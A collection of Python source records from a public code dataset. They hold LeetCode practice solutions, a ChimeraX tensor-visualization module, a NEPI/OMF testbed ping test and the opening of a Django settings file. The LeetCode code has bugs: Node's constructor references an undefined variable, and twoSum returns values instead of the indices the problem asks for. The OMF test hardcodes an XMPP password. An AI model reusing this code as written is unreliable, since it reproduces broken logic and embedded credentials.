result\n","repo_name":"fphammerle/ioex","sub_path":"ioex/cursesex.py","file_name":"cursesex.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33148174817","text":"'''\nProblem: Given an array of integers, return indices of the two numbers such\nthat they add up to a specific target\n\nRestate: I'm going to have a a function that takes in a list of integers,\nas well as a target. My job is to find and return the pair of integers\nwho's sum is the target, correct?\n\nQuestions:\n- Will the array be sorted?\n- Will there be any negative integers?\n- Are there duplicates in the array?\n- Are the arrays always going to be relatively small?\n\nAssumptions:\n- Numbers will always be integers\n- Input is sorted\n- Return type is array of two values\n'''\n\n\ndef twoSum(nums, target):\n for i in range(len(nums)):\n for x in range(i+1, len(nums)):\n sum = nums[i] + nums[x]\n if sum == target:\n return[nums[i],nums[x]]\n return False\n\n\n'''\nProblem: Merge two sorted linked lists and return it as a new list. The new\nlist should be made by splicing together the nodes of the first two lists.\n\nRestate: I'm going to have two linked lists, and my goal is to combine both\nand have them sorted in a new linked list.\n\n\nQuestions:\n- Will there be any negative integers?\n- Are there duplicates in a specific array?\n- Are the arrays always going to be relatively small?\n\nAssumptions:\n- Numbers will always be integers\n- Return type is array of both initial lists merged together\n\nPSUDOCODE:\n\n1. create node class\n2. create method header that takes in 2 ll\n3. create head and curr\n4. loop through the lists while there is data left\n5. check which is greater from both lists and add that to list\n6. return\n'''\n\n\nclass Node:\n def __init__(self, data = None, next=None):\n self.val = x\n self.next = next\n\nclass Solution:\n def mergeTwoLists(self, l1: Node, l2: Node) -> Node:\n curr = Node()\n head = curr\n while l1 or l2:\n if l1 and (not l2 or l1.val <= l2.val):\n curr.next = Node(l1.val)\n l1 = l1.next\n else:\n curr.next = Node(l2.val)\n l2 = l2.next\n curr = curr.next\n return head.next\n\n\n\ndef main():\n print(\"yo\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"iOSGonzo/CodingChallenges","sub_path":"leetcode.py","file_name":"leetcode.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15017346291","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 19 13:17:18 2020\n\n@author: albertsmith\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 4 15:05:03 2020\n\n@author: albertsmith\n\nCollection of functions for plotting residual tensors onto molecules in Chimera\n\"\"\"\n\n\nimport os\ncurdir=os.getcwd()\nimport numpy as np\nfrom scipy.spatial import Delaunay\nfrom mpl_toolkits import mplot3d\n#from mayavi.mlab import triangular_plot\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nos.chdir('../Struct')\nfrom vf_tools import d2,Spher2pars,norm,getFrame,Rspher,sc2angles\nos.chdir('../chimera')\nfrom chimera_funs import chimera_path,run_command\nfrom shutil import copyfile\nos.chdir(curdir)\n\n\ndef get_path(filename=None):\n \"\"\"This function opens a file for writing, putting it in the same folder as \n the chimera_funs.py script\"\"\"\n dir_path = os.path.dirname(os.path.realpath(__file__))\n \n if filename is None:\n return dir_path\n else:\n full_path=os.path.join(dir_path,filename)\n return full_path\n \n \ndef tensor2xyz(delta,eta,alpha,beta,gamma,sc=2.18,q=8):\n \"\"\"\n Calculates x,y, and z coordinates for a rank-2 tensor having delta and eta, \n and euler angles alpha, beta, and gamma. The scaling is set so that an \n unaveraged tensor spans the full length of an H–C bond. Can be adjusted for\n other bond lengths.\n \"\"\"\n \n sc=np.sqrt(2/3)*sc\n \n a,b=sphere(q)\n \n A=[-1/2*delta*eta,0,np.sqrt(3/2)*delta,0,-1/2*delta*eta] #Components in PAS\n \n #0 component after rotation by a and b\n A0=np.array([A[mp+2]*d2(b,m=0,mp=mp)*np.exp(1j*mp*a) for mp in range(-2,3)]).sum(axis=0).real\n \n #Coordinates before rotation by alpha, beta, gamma\n x0=np.cos(a)*np.sin(b)*np.abs(A0)*sc/2\n y0=np.sin(a)*np.sin(b)*np.abs(A0)*sc/2\n z0=np.cos(b)*np.abs(A0)*sc/2\n\n \n #Rotate by alpha\n x1,y1,z1=x0*np.cos(alpha)+y0*np.sin(alpha),-x0*np.sin(alpha)+y0*np.cos(alpha),z0\n #Rotate by beta\n x2,y2,z2=x1*np.cos(beta)-z1*np.sin(beta),y1,np.sin(beta)*x1+np.cos(beta)*z1\n #Rotate by gamma\n x,y,z=x2*np.cos(gamma)+y2*np.sin(gamma),-x2*np.sin(gamma)+y2*np.cos(gamma),z2\n\n \"\"\"\n Here, we create a group index. The plots come out nicer if we separate positive\n and negative parts (A0) and separate different lobes of the tensor\n \"\"\"\n \n# index=list()\n# i=np.argwhere(A0>=0).squeeze()\n# index.append(i)\n# index.append(i+n)\n# \n# if eta>0.15:\n# i=np.argwhere(np.logical_and(A0<=0,np.logical_or(a<=np.pi/2,a>3*np.pi/2))).squeeze()\n# index.append(i)\n# i=np.argwhere(np.logical_and(A0<=0,np.logical_or(a>np.pi/2,a<=3*np.pi/2))).squeeze()\n# index.append(i)\n# else:\n# i=np.argwhere(A0<=0).squeeze()\n# index.append(np.concatenate((i,i+n)))\n \n# index=[np.argwhere(A0>=0).squeeze(),np.argwhere(A0<=0).squeeze()]\n\n return x,y,z,A0\n\ndef sphere(q=8):\n \"\"\"\n Returns a set of Euler angles (alpha,beta) over a sphere. Note- this is not\n a valid powder average for simulations– the first alpha value is redundant\n with the last alpha value for each beta (that is, alpha[-1]=alpha[0]+2*pi,\n for each beta). This allows us to use a triangulation algorithm for 3D \n plotting but would distort simulation results.\n \n alpha,beta = sphere(q=8)\n \"\"\"\n NP=np.ceil(q*np.sin(np.arange(0.5,q+0.5)*np.pi/(2*q))).astype(int)\n NP41=4*NP+1\n \n nF0=NP.sum()\n nF = NP41.sum()\n \n alpha=np.zeros(nF)\n beta=np.zeros(nF)\n \n theta_j = 0;\n count = 0;\n\n for j in range(q):\n dtheta = np.arccos(np.cos(theta_j) - NP[j]/nF0 ) - theta_j\n beta[np.arange(count,count+NP41[j])] = theta_j + dtheta/2\n dphi = np.pi/(2*NP[j]);\n alpha[count:count+4*NP[j]] = np.linspace(0.5*dphi,(4*NP[j] - 0.5)*dphi,4*NP[j]);\n alpha[count+4*NP[j]]=alpha[count+4*NP[j]-1]-2*np.pi\n count = count + NP41[j];\n theta_j += dtheta;\n \n alpha=np.concatenate(([0],alpha,alpha[::-1],[0]))\n beta=np.concatenate(([0],beta,np.pi-beta[::-1],[np.pi]))\n \n return alpha,beta\n \n\ndef draw_tensorsX(data,tensors='A_m0_finF',index=None,tstep=0,sc=2.09,fileout=None,\\\n scene=None,pos=None,png_opts=None,chimera_cmds=None,marker=None):\n \"\"\"\n Plots averaged tensors onto a molecule in chimera. A molecule object is required,\n where sel1/sel2 determine which bonds the molecules are to be plotted onto.\n The tensors themselves should also be provided, where they are defined in\n the frame of the bond. These may be provided by either giving a data object\n as the first argument, which then contains both the molecule objection and\n the tensors (the tensors should be in data.vars, and then one provides a\n string 'tensors' which gives the appropriate key to find the tensors). \n Alternatively, one may provide the molecule object as the first argument,\n in which case 'tensors' should be a 5xN numpy array with the tensors given \n directly.\n \n Note, the molecule object must still contain the tensor frame function \n (mol._vft is not None). This should return the orientation of the bond. \n mol.sel1 and mol.sel2 should define the atoms yielding the bond position.\n \n Optional arguments:\n sc: Deterines the length of tensors. If provided, this value specifies\n the length of a tensor with delta=1,eta=0. If not provide or None,\n the largest tensor is scaled to extend 2x the mean bond length,\n which is determined from the atom positions in data.sens.mol.sel1\n and data.sens.mol.sel2 (if pos is provided, then bond lengths \n are instead assumed to be 1.09)\n q: Quality of the tensor plot. Default is 10 (smoother tensors for\n higher values)\n index: Index of the tensors to be plotted. Default plots all tensors\n pos: Position of the tensors to plotted. Default position taken from\n mean position between mol.sel1 and mol.sel2\n tensors:Specify which tensor to plot or provide the tensors directly. \n Options are \"D2inf\" (D2 evaluated at infinite time), \"avg_tensor\"\n which is the averaged rank-2 tensor, or one may provide a dict\n specifying the tensor directly (with delta (N,),eta(N,),euler(3,N)).\n Note, if tensors is provided directly, one may replace the data\n object with a molecule object\n fileout:Save the resulting figure to a png\n scene: Load a scene saved previously in chimera\n png_opts:A string passed to chimera while saving the image\n (Command: copy file {fileout} png {png_opts})\n chimera_cmds:List of valid chimera commands (executed within chimera)\n marker: Color in one or more tensors with a different color (green/yellow)\n instead of red/blue). List of indices or logical index\n \n draw_tensorsX(data,sc=None,tensors='A_m0_finF',index=None,fileout=None,scene=None,pos=None,png_opts=None,chimera_cmds=None)\n \n \"\"\"\n \n \n \"Setup\"\n if not isinstance(tensors,str) and hasattr(data,'pdb'):\n mol=data\n elif isinstance(tensors,str):\n if tensors in data.vars:\n tensors=data.vars[tensors]\n mol=data.sens.molecule\n \n if index is None:\n index=np.arange(tensors.shape[1],dtype=int)\n else:\n index=np.array(index,dtype=bool) if (np.size(index)==tensors.shape[1] and np.max(index)<2) else np.array(index,dtype=int)\n tensors=tensors[:,index]\n\n \n\n mol.mda_object.trajectory[tstep] #Go to the requested time step\n\n \"Get the current positions of the bonds\"\n if pos is None:\n pos=(mol.sel1.positions[index]+mol.sel2.positions[index]).T/2\n \n \"Get the current orientations of the bonds, rotate tensors accordingly\"\n vZ,vXZ=mol._vft()\n vZ=norm(vZ)\n scF=getFrame(vZ[:,index],vXZ[:,index])\n tensors=Rspher(tensors,*scF)\n \n \"Convert tensors into parameters\"\n tensors=Spher2pars(tensors)\n \n \"Make sure we have the pdb or a path to the scene was given\"\n if mol.pdb is not None:\n a=np.char.find(mol.pdb[::-1],'.')\n b=np.char.find(mol.pdb[::-1],'_')\n ts=np.array(mol.pdb[-b:-a-1],dtype=int)\n if tstep!=ts and scene is None:\n mol.pdb=None\n \n sel=None\n if scene is not None:\n pdb=None\n# elif mol.pdb is not None:\n# pdb=mol.pdb\n else:\n try:\n if np.unique(mol.sel1.segids).size==1 and np.unique(mol.sel1.resids).size==1:\n select='resid {0} and segid {1}'.format(mol.sel1[0].resid,mol.sel1[0].segid)\n elif np.unique(mol.sel1.segids).size==1:\n select='segid {1}'.format(mol.sel1[0].segid)\n elif np.unique(mol.sel1.resids).size==1:\n select='resid {0}'.format(mol.sel1[0].resid)\n sel=mol.mda_object.select_atoms(select)\n mol.mda_object.trajectory[tstep]\n pdb=get_path('pdb{0}.pdb'.format(tstep))\n mp=sel.positions.mean(0)\n sel.positions=sel.positions-mp\n pos=(pos.T-mp).T\n sel.write(pdb)\n# mol.MDA2pdb(tstep=tstep,select=select)\n# pdb=mol.pdb\n except:\n print('Failed to created pdb for drawing')\n return\n \n\n delta=tensors[0]\n eta=tensors[1]\n euler=tensors[2:]\n \n theta_steps=100\n phi_steps=50\n positive_color=(255,100,100,255)\n negative_color=(100,100,255,255)\n \n run_chimeraX(delta,eta,euler,pos,theta_steps,phi_steps,positive_color,\\\n negative_color,fileout,png_opts,chimera_cmds,sc=sc,pdb=pdb,scene=scene,marker=marker)\n \ndef only_tensorsX(tensors=None,delta=None,eta=None,euler=None,index=None,fileout=None,pos=None,png_opts=None,chimera_cmds=None):\n \"\"\"\n Draws tensors in chimeraX, using python options.\n \n only_tensorsX(delta,eta=None,euler=None,fileout=None,pos=None,png_opts=None)\n \n If multiple tensors are given, this will automatically space them out. One\n may also provide the position\n \n chimera_cmds is a list of strings that are applied as commands in chimera\n \n fileout will save the chimera window as a png. Program will automatically close\n after saving! (intended for scripting multiple images, hence we don't want\n lots of chimera instances staying open)\n \n png_opts is a string appended to the 'save' command if fileout is used\n \n \"\"\"\n \n \n \n delta=np.atleast_1d(delta)\n n=delta.size\n eta=np.zeros(n) if eta is None else np.atleast_1d(eta)\n euler=np.zeros([3,n]) if euler is None else np.atleast_2d(euler)\n if euler.shape[0]==1:euler=euler.T\n \n \"Apply index\"\n if index is None:index=np.ones(n,dtype=bool)\n index=np.ones(n,dtype=bool) if index is None else np.atleast_1d(index)\n delta=delta[index]\n eta=eta[index]\n euler=euler[:,index]\n \n \n theta_steps=100\n phi_steps=50\n positive_color=(255,100,100,255)\n negative_color=(100,100,255,255)\n run_chimeraX(delta,eta,euler,pos,theta_steps,phi_steps,positive_color,\\\n negative_color,fileout,png_opts,chimera_cmds)\n\ndef run_chimeraX(delta,eta,euler,pos,theta_steps,phi_steps,\n positive_color,negative_color,fileout,png_opts,\n chimera_cmds,sc=1,pdb=None,scene=None,marker=None):\n n=delta.size\n rand_index=np.random.randint(1e6)\n full_path=get_path('chimera_script{0:06d}.py'.format(rand_index))\n \n tensor_file=get_path('tensors{0:06d}.txt'.format(rand_index))\n \n \"Get the positions of each tensor\"\n if pos is None:\n step=np.abs(delta).max()*1.1\n pos=np.zeros([3,n])\n pos[0]=np.linspace(0,n*step,n,endpoint=False)\n else:\n pos=np.atleast_2d(pos)\n if pos.shape[0]==1:pos=pos.T\n \n \"Write tensors to file\"\n write_tensor(tensor_file,delta,eta,euler,pos,marker)\n \n\n \n with open(full_path,'w') as f:\n py_line(f,'import os')\n py_line(f,'import numpy as np')\n py_line(f,run_command(version='X'))\n \n copy_funs(f) #Copy required functions into chimeraX script\n \n \n py_line(f,'try:')\n if scene is not None:\n WrCC(f,'open '+scene,1)\n elif pdb is not None:\n WrCC(f,'open '+pdb,1)\n py_line(f,'load_surface(session,\"{0}\",sc={1},theta_steps={2},phi_steps={3},positive_color={4},negative_color={5})'\\\n .format(tensor_file,sc,theta_steps,phi_steps,positive_color,negative_color),1)\n if chimera_cmds is not None:\n if isinstance(chimera_cmds,str):chimera_cmds=[chimera_cmds]\n for cmd in chimera_cmds:\n WrCC(f,cmd,1)\n if fileout is not None:\n if fileout[-4:]!='.png':fileout=fileout+'.png'\n if png_opts is None:png_opts=''\n WrCC(f,\"save \" +fileout+' '+png_opts,1)\n \n py_line(f,'except:')\n py_line(f,'print(\"Error in chimera script\")',1)\n py_line(f,'finally:')\n py_line(f,'os.remove(\"{0}\")'.format(full_path),1)\n py_line(f,'os.remove(\"{0}\")'.format(tensor_file),1)\n if pdb is not None:py_line(f,'os.remove(\"{0}\")'.format(pdb))\n if fileout is not None: #Exit if a file is saved\n WrCC(f,'exit',1)\n \n \n copyfile(full_path,full_path[:-9]+'.py')\n copyfile(tensor_file,tensor_file[:-10]+'.txt')\n \n os.spawnl(os.P_NOWAIT,chimera_path(version='X'),chimera_path(version='X'),full_path)\n\ndef copy_funs(f):\n \"\"\"\n Copys all functions in THIS file below the comment \"Files used inside ChimeraX\"\n \n Input is the file handle, f, to which the pythons functions should be copied\n \n copy_funs(f)\n \"\"\"\n \n with open(get_path('vis3D.py'),'r') as funs:\n start_copy=False\n for line in funs:\n if start_copy:\n f.write(line)\n else:\n if len(line)>=30 and line[:30]==\"#%% Files used inside ChimeraX\":\n start_copy=True\n \ndef py_line(f,text,nt=0):\n \"\"\"\n Prints a line to a file for reading as python code. Inserts the newline and\n also leading tabs (if nt specified)\n \n python_line(f,text,nt=0)\n \"\"\"\n \n for _ in range(nt):\n f.write('\\t')\n f.write(text)\n f.write('\\n')\n\ndef write_tensor(filename,delta,eta=None,euler=None,pos=None,marker=None):\n \"\"\"\n Writes out a tab-separated file with delta, eta, alpha, beta, gamma, and\n x,y,z for tensors. For reading within ChimeraX\n \n write_tensor(filename,delta,eta=None,euler=None,pos=None,marker=None)\n \"\"\"\n \n delta=np.array(delta)\n n=delta.size\n \n #Defaults, make sure all numpy arrays\n eta=np.zeros(n) if eta is None else np.array(eta)\n euler=np.zeros([3,n]) if euler is None else np.array(euler)\n pos=np.zeros([3,n]) if pos is None else np.array(pos)\n if marker is None:\n marker=np.zeros(n)\n else:\n if not(hasattr(marker,'__len__')):marker=[marker]\n if len(marker)1:\n m1=marker\n marker=np.zeros(n)\n marker[np.array(m1,dtype=int)]=1\n \n if len(euler)==3:\n alpha,beta,gamma=euler\n else:\n alpha,beta,gamma=sc2angles(*euler)\n X,Y,Z=pos\n \n with open(filename,'w') as f:\n for vals in zip(delta,eta,alpha,beta,gamma,X,Y,Z,marker):\n for v in vals[:-1]:f.write('{0:16.8}\\t'.format(v))\n f.write('{0:d}\\t'.format(int(vals[-1])))\n f.write('\\n')\n\n\ndef WrCC(f,command,nt=1):\n \"Function to print chimera commands correctly\"\n for _ in range(nt):\n f.write('\\t')\n f.write('rc(session,\"{0}\")\\n'.format(command))\n#%% Files used inside ChimeraX (don't edit this comment!!..it will break the code)\n\"\"\"\nEverything after these lines is printed into the chimeraX script, so don't add\nanything below that you don't need in chimeraX\n\"\"\"\ndef sphere_triangles(theta_steps=100,phi_steps=50):\n \"\"\"\n Creates arrays of theta and phi angles for plotting spherical tensors in ChimeraX.\n Also returns the corresponding triangles for creating the surfaces\n \"\"\"\n \n theta=np.linspace(0,2*np.pi,theta_steps,endpoint=False).repeat(phi_steps)\n phi=np.repeat([np.linspace(0,np.pi,phi_steps,endpoint=True)],theta_steps,axis=0).reshape(theta_steps*phi_steps)\n \n triangles = []\n for t in range(theta_steps):\n for p in range(phi_steps-1):\n i = t*phi_steps + p\n t1 = (t+1)%theta_steps\n i1 = t1*phi_steps + p\n triangles.append((i,i+1,i1+1))\n triangles.append((i,i1+1,i1))\n \n return theta,phi,triangles\n \ndef spherical_surface(delta,eta=None,euler=None,pos=None,sc=2.09,\n theta_steps = 100,\n phi_steps = 50,\n positive_color = (255,100,100,255), # red, green, blue, alpha, 0-255 \n negative_color = (100,100,255,255)):\n \"\"\"\n Function for generating a surface in ChimeraX. delta, eta, and euler angles\n should be provided, as well positions for each tensor (length of all arrays\n should be the same, that is (N,), (N,), (3,N), (3,N) respectively.\n \n Returns arrays with the vertices positions (Nx3), the triangles definitions\n (list of index triples, Nx3), and a list of colors (Nx4)\n \n xyz,tri,colors=spherical_surface(delta,eta=None,euler=None,pos=None,\n theta_steps=100,phi_steps=50,\n positive_color=(255,100,100,255),\n negative_color=(100,100,255,255))\n \"\"\"\n # Compute vertices and vertex colors\n a,b,triangles=sphere_triangles(theta_steps,phi_steps)\n \n if euler is None:euler=[0,0,0]\n if pos is None:pos=[0,0,0]\n if eta is None:eta=0\n \n # Compute r for each set of angles\n sc=np.sqrt(2/3)*sc\n \n A=[-1/2*delta*eta,0,np.sqrt(3/2)*delta,0,-1/2*delta*eta] #Components in PAS\n \n #0 component after rotation by a and b\n A0=np.array([A[mp+2]*d2(b,m=0,mp=mp)*np.exp(1j*mp*a) for mp in range(-2,3)]).sum(axis=0).real\n \n #Coordinates before rotation by alpha, beta, gamma\n x0=np.cos(a)*np.sin(b)*np.abs(A0)*sc/2\n y0=np.sin(a)*np.sin(b)*np.abs(A0)*sc/2\n z0=np.cos(b)*np.abs(A0)*sc/2\n\n alpha,beta,gamma=euler\n #Rotate by alpha\n x1,y1,z1=x0*np.cos(alpha)+y0*np.sin(alpha),-x0*np.sin(alpha)+y0*np.cos(alpha),z0\n #Rotate by beta\n x2,y2,z2=x1*np.cos(beta)-z1*np.sin(beta),y1,np.sin(beta)*x1+np.cos(beta)*z1\n #Rotate by gamma\n x,y,z=x2*np.cos(gamma)+y2*np.sin(gamma),-x2*np.sin(gamma)+y2*np.cos(gamma),z2\n\n x=x+pos[0]\n y=y+pos[1]\n z=z+pos[2]\n \n# xyz=[[x0,y0,z0] for x0,y0,z0 in zip(x,y,z)]\n #Determine colors\n colors=np.zeros([A0.size,4],np.uint8)\n colors[A0>=0]=positive_color\n colors[A0<0]=negative_color\n \n\n # Create numpy arrays\n# xyz = np.array(xyz, np.float32)\n xyz=np.ascontiguousarray(np.array([x,y,z]).T,np.float32) #ascontiguousarray forces a transpose in memory- not just editing the stride\n colors = np.array(colors, np.uint8)\n tri = np.array(triangles, np.int32)\n\n return xyz,tri,colors\n \n\ndef load_tensor(filename):\n \"\"\"\n Reads in a tab-separated file with delta, eta, alpha,beta, gamma, and x,y,z\n for a set of tensors. \n \n delta,eta,euler,pos=load_tensor(filename)\n \"\"\"\n delta=list()\n eta=list()\n alpha=list()\n beta=list()\n gamma=list()\n x=list()\n y=list()\n z=list()\n marker=list()\n with open(filename,'r') as f:\n for line in f:\n out=line.strip().split('\\t')\n out=[np.array(o,float) for o in out]\n delta.append(out[0])\n eta.append(out[1])\n alpha.append(out[2])\n beta.append(out[3])\n gamma.append(out[4])\n x.append(out[5])\n y.append(out[6])\n z.append(out[7])\n marker.append(out[8])\n\n delta=np.array(delta)\n eta=np.array(eta)\n euler=np.array([alpha,beta,gamma]).T\n pos=np.array([x,y,z]).T\n marker=np.array(marker)\n\n return delta,eta,euler,pos,marker \n \n \n\ndef load_surface(session,tensor_file,sc=2.09,theta_steps=100,phi_steps=50,\n positive_color=(255,100,100,255),negative_color=(100,100,255,255)):\n \n Delta,Eta,Euler,Pos,Marker=load_tensor(tensor_file)\n \n from chimerax.core.models import Surface\n from chimerax.surface import calculate_vertex_normals,combine_geometry_vntc\n \n geom=list()\n \n for k,(delta,eta,euler,pos,marker) in enumerate(zip(Delta,Eta,Euler,Pos,Marker)):\n if marker==1:\n pc=(100,255,100,255)\n nc=(255,255,100,255)\n else:\n pc=positive_color\n nc=negative_color\n xyz,tri,colors=spherical_surface(\\\n delta=delta,eta=eta,euler=euler,pos=pos,\\\n sc=sc,theta_steps=theta_steps,\\\n phi_steps=phi_steps,\\\n positive_color=pc,\\\n negative_color=nc)\n\n norm_vecs=calculate_vertex_normals(xyz,tri)\n \n geom.append((xyz,norm_vecs,tri,colors)) \n \n xyz,norm_vecs,tri,colors=combine_geometry_vntc(geom) \n s = Surface('surface',session)\n s.set_geometry(xyz,norm_vecs,tri)\n s.vertex_colors = colors\n session.models.add([s])\n\n return s\n\n\ndef d2(c=0,s=None,m=None,mp=0):\n \"\"\"\n Calculates components of the d2 matrix. By default only calculates the components\n starting at m=0 and returns five components, from -2,-1,0,1,2. One may also\n edit the starting component and select a specific final component \n (mp=None returns all components, whereas mp may be specified between -2 and 2)\n \n d2_m_mp=d2(m,mp,c,s) #c and s are the cosine and sine of the desired beta angle\n \n or\n \n d2_m_mp=d2(m,mp,beta) #Give the angle directly\n \n Setting mp to None will return all values for mp in a 2D array\n \n (Note that m is the final index)\n \"\"\"\n \n if s is None:\n c,s=np.cos(c),np.sin(c)\n \n \"\"\"\n Here we define each of the components as functions. We'll collect these into\n an array, and then call them out with the m and mp indices\n \"\"\"\n \"First, for m=-2\"\n \n if m is None or mp is None:\n if m is None and mp is None:\n print('m or mp must be specified')\n return\n elif m is None:\n if mp==-2:\n index=range(0,5)\n elif mp==-1:\n index=range(5,10)\n elif mp==0:\n index=range(10,15)\n elif mp==1:\n index=range(15,20)\n elif mp==2:\n index=range(20,25)\n elif mp is None:\n if m==-2:\n index=range(0,25,5)\n elif m==-1:\n index=range(1,25,5)\n elif m==0:\n index=range(2,25,5)\n elif m==1:\n index=range(3,25,5)\n elif m==2:\n index=range(4,25,5)\n else:\n index=[(mp+2)*5+(m+2)]\n \n out=list() \n for i in index:\n #mp=-2\n if i==0:x=0.25*(1+c)**2\n if i==1:x=0.5*(1+c)*s\n if i==2:x=np.sqrt(3/8)*s**2\n if i==3:x=0.5*(1-c)*s\n if i==4:x=0.25*(1-c)**2\n #mp=-1\n if i==5:x=-0.5*(1+c)*s\n if i==6:x=c**2-0.5*(1-c)\n if i==7:x=np.sqrt(3/8)*2*c*s\n if i==8:x=0.5*(1+c)-c**2\n if i==9:x=0.5*(1-c)*s\n #mp=0\n if i==10:x=np.sqrt(3/8)*s**2\n if i==11:x=-np.sqrt(3/8)*2*s*c\n if i==12:x=0.5*(3*c**2-1)\n if i==13:x=np.sqrt(3/8)*2*s*c\n if i==14:x=np.sqrt(3/8)*s**2\n #mp=1\n if i==15:x=-0.5*(1-c)*s\n if i==16:x=0.5*(1+c)-c**2\n if i==17:x=-np.sqrt(3/8)*2*s*c\n if i==18:x=c**2-0.5*(1-c)\n if i==19:x=0.5*(1+c)*s\n #mp=2\n if i==20:x=0.25*(1-c)**2\n if i==21:x=-0.5*(1-c)*s\n if i==22:x=np.sqrt(3/8)*s**2\n if i==23:x=-0.5*(1+c)*s\n if i==24:x=0.25*(1+c)**2\n out.append(x)\n \n if m is None or mp is None:\n return np.array(out)\n else:\n return out[0]\n","repo_name":"alsinmr/pyDIFRATE","sub_path":"chimera/unused/vis3D.py","file_name":"vis3D.py","file_ext":"py","file_size_in_byte":24508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11932241720","text":"from nepi.execution.resource import ResourceFactory, ResourceManager, ResourceAction, ResourceState\nfrom nepi.execution.ec import ExperimentController\n\nfrom nepi.resources.omf.node import OMFNode\nfrom nepi.resources.omf.application import OMFApplication\nfrom nepi.resources.omf.interface import OMFWifiInterface\nfrom nepi.resources.omf.channel import OMFChannel\nfrom nepi.resources.omf.omf_api_factory import OMFAPIFactory\n\nfrom nepi.util.timefuncs import *\n\nimport os\nimport time\nimport unittest\n\nclass OMFPingNormalCase(unittest.TestCase):\n def test_deploy(self):\n ec = ExperimentController(exp_id = \"5421\" )\n\n self.node1 = ec.register_resource(\"omf::Node\")\n ec.set(self.node1, 'hostname', 'wlab12')\n ec.set(self.node1, 'xmppUser', \"nepi\")\n ec.set(self.node1, 'xmppServer', \"xmpp-plexus.onelab.eu\")\n ec.set(self.node1, 'xmppPort', \"5222\")\n ec.set(self.node1, 'xmppPassword', \"1234\")\n \n self.iface1 = ec.register_resource(\"omf::WifiInterface\")\n ec.set(self.iface1, 'name', \"wlan0\")\n ec.set(self.iface1, 'mode', \"adhoc\")\n ec.set(self.iface1, 'hw_mode', \"g\")\n ec.set(self.iface1, 'essid', \"vlcexp\")\n ec.set(self.iface1, 'ip', \"10.0.0.17/24\")\n \n self.channel = ec.register_resource(\"omf::Channel\")\n ec.set(self.channel, 'channel', \"6\")\n ec.set(self.channel, 'xmppUser', \"nepi\")\n ec.set(self.channel, 'xmppServer', \"xmpp-plexus.onelab.eu\")\n ec.set(self.channel, 'xmppPort', \"5222\")\n ec.set(self.channel, 'xmppPassword', \"1234\")\n \n self.app1 = ec.register_resource(\"omf::Application\")\n ec.set(self.app1, 'appid', 'Vlc#1')\n ec.set(self.app1, 'command', \"ping -c5 10.0.0.17\")\n\n ec.register_connection(self.app1, self.node1)\n ec.register_connection(self.node1, self.iface1)\n ec.register_connection(self.iface1, self.channel)\n\n ec.register_condition(self.app1, ResourceAction.STOP, self.app1, ResourceState.STARTED , \"10s\")\n\n ec.deploy()\n\n ec.wait_finished(self.app1)\n\n stdout_1 = ec.trace(self.app1, \"stdout\")\n stderr_1 = ec.trace(self.app1, \"stderr\")\n\n if stdout_1:\n f = open(\"app1_out.txt\", \"w\")\n f.write(stdout_1)\n f.close()\n\n if stderr_1:\n f = open(\"app1_err.txt\", \"w\")\n f.write(stderr_1)\n f.close()\n\n self.assertEquals(ec.get_resource(self.node1).state, ResourceState.STARTED)\n self.assertEquals(ec.get_resource(self.iface1).state, ResourceState.STARTED)\n self.assertEquals(ec.get_resource(self.channel).state, ResourceState.STARTED)\n self.assertEquals(ec.get_resource(self.app1).state, ResourceState.STOPPED)\n\n ec.shutdown()\n\n self.assertEquals(ec.get_resource(self.node1).state, ResourceState.RELEASED)\n self.assertEquals(ec.get_resource(self.iface1).state, ResourceState.RELEASED)\n self.assertEquals(ec.get_resource(self.channel).state, ResourceState.RELEASED)\n self.assertEquals(ec.get_resource(self.app1).state, ResourceState.RELEASED)\n\n t = open(\"app1_out.txt\", \"r\")\n l = t.readlines()\n self.assertEquals(l[0], \"PING 10.0.0.17 (10.0.0.17) 56(84) bytes of data.\\n\")\n self.assertIn(\"5 packets transmitted, 5 received, 0% packet loss, time\", l[-2])\n self.assertIn(\"rtt min/avg/max/mdev = \", l[-1])\n \n t.close()\n os.remove(\"app1_out.txt\")\n \n\n\nif __name__ == '__main__':\n unittest.main()\n\n\n\n","repo_name":"phiros/nepi","sub_path":"test/resources/omf/omf6_vlc_traces.py","file_name":"omf6_vlc_traces.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25491348188","text":"# Django settings for guardhouse project.\n\nfrom os import path\nSITE_ROOT = path.dirname(path.realpath(__file__))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Ulrich Petri', 'guardhouse@ulo.pe'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'guardhouse',\n 'USER': 'httpd',\n 'PASSWORD': '',\n 'HOST': '',\n 'PORT': '',\n }\n}\n\nCACHES = {\n 'default': {\n 'BACKEND': 'redis_cache.RedisCache',\n 'LOCATION': 'localhost:6379',\n },\n}\n\n# Celery\nBROKER_BACKEND = \"redis\"\nBROKER_HOST = \"localhost\"\nBROKER_PORT = 6379\nBROKER_VHOST = \"0\"\nCELERY_RESULT_BACKEND = \"redis\"\nREDIS_HOST = \"localhost\"\nREDIS_PORT = 6379\n\n\nTIME_ZONE = 'Europe/Berlin'\n\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nMEDIA_ROOT = path.join(SITE_ROOT, \"media\")\n\nMEDIA_URL = '/media/'\n\nSTATIC_ROOT = path.join(SITE_ROOT, \"static\")\n\nSTATIC_URL = '/static/'\n\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\nLOGIN_URL = '/auth/login/'\nLOGIN_REDIRECT_URL = '/dashboard/'\nLOGIN_ERROR_URL = '/auth/loginerror/'\n\nSTATICFILES_DIRS = (\n 